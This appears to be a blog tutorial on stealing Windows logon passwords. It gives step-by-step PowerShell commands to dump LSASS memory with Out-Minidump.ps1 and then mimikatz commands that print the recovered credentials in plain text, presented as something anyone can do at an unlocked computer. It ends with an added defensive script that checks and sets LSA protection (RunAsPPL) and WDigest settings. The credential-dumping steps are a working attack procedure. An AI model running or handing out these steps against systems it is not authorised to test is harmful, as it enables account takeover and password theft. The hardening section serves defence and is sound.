Did you know that your Windows passwords are vulnerable and hackable in less than 5 minutes?
Yep, even in Windows 10 the method still works nicely, and it is not new at all. So let me show how you can reproduce it using a simple exploitation tool and a PowerShell script. Anyone can perform this when you leave your computer unlocked. I’m not really going to explain the details, just go straight to the steps. Google is at your fingertips if you are keen to explore more.
Getting started
First, you need to get the tool called mimikatz (just the binary package, e.g. mimikatz_trunk.zip) and the PowerShell script Out-Minidump.ps1 by Matthew Graeber. Let’s start!
Using PowerShell to perform the memory dump
To perform the LSASS dump we will use the PowerShell script Out-Minidump.ps1. It has to run in an elevated (administrator) PowerShell session, because reading the memory of LSASS requires debug privilege. The sequence of cmdlets looks like this:
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# Dot-source the script so its Out-Minidump function is imported into the session
Get-Process lsass | Out-Minidump
# Write a minidump of the LSASS process to the current directory (named <process>_<PID>.dmp)
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to the desired location
Using the mimikatz terminal program to view the passwords
As you can see, lsass_868.dmp is an example of an LSASS dump file captured using the PowerShell script (the number is the process ID of lsass on that machine, so yours will differ). Now it’s time to load the dump file in the mimikatz terminal as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
mimikatz now reads from the minidump file instead of the live process, so we can view the passwords. Run this command to display all the accounts and credentials it can recover:
sekurlsa::logonPasswords full
Tadaa… Now I can see my actual Microsoft Account username and password in plain text. As you can imagine, most people nowadays still use the same password for almost everything, so I expect you can picture all the consequences of this vulnerability…
The existing vulnerability
The password is encrypted in memory, but that offers little protection: the encryption relies on two basic Win32 functions, LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). Because Windows keeps the encrypted password itself rather than a one-way hash, anything that can read the memory of LSASS can reverse that encryption the same way LsaUnprotectMemory does and recover the plain text.
The bottom line
You will be safe as long as you always lock your computer when you’re away. For more explanation and security advice, you might want to check the original article here. This short article is just a reminder to me and anyone else to always be careful in whatever we do, especially with anything to do with passwords and personal credentials. No system is perfect!
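As an added, defender-side example (not part of the original post), here is a PowerShell check for the two Windows settings that make this dump route fail or come back without plain-text passwords: LSA protection (RunAsPPL), which stops unprotected processes from opening LSASS for the access a minidump needs, and the WDigest UseLogonCredential value, which controls whether a reversible copy of the logon password is kept in LSASS memory. The registry paths and values are documented Windows settings; the function name Test-LsassHardening is my own.

```powershell
# Added hardening check, not from the original post. Registry settings used:
#   HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1
#       runs LSASS as a Protected Process Light, so an unprotected process
#       (even an elevated one) cannot open it with the read access a minidump needs
#   HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0
#       stops WDigest keeping a reversible copy of the logon password in LSASS memory
# Run from an elevated session. Changes take effect after a reboot.
function Test-LsassHardening {
    [CmdletBinding()]
    param(
        [switch]$Remediate   # apply the hardened values instead of only reporting
    )

    $checks = @(
        @{ Name = 'LSA Protection (RunAsPPL)'
           Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
           Key  = 'RunAsPPL'; Want = 1 },
        @{ Name = 'WDigest plaintext caching (UseLogonCredential)'
           Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
           Key  = 'UseLogonCredential'; Want = 0 }
    )

    foreach ($c in $checks) {
        # A missing value reads back as $null. RunAsPPL is off unless set; an absent
        # UseLogonCredential behaves as 0 on Windows 8.1 and later, so pinning it
        # to 0 simply makes the intended state explicit and auditable.
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Key -ErrorAction SilentlyContinue).($c.Key)
        $ok = ($current -eq $c.Want)

        if (-not $ok -and $Remediate) {
            if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
            Set-ItemProperty -Path $c.Path -Name $c.Key -Value $c.Want -Type DWord
            $ok = $true
        }

        [pscustomobject]@{
            Setting  = $c.Name
            Current  = if ($null -eq $current) { 'not set' } else { $current }
            Expected = $c.Want
            Status   = if ($ok) { 'OK' } else { 'WEAK' }
        }
    }
}

# Report only; add -Remediate to apply the hardened values
Test-LsassHardening | Format-Table -AutoSize
```

With RunAsPPL in place, the Get-Process lsass | Out-Minidump step above fails with an access-denied error even from an elevated session, which is the behaviour you want to see when you re-test.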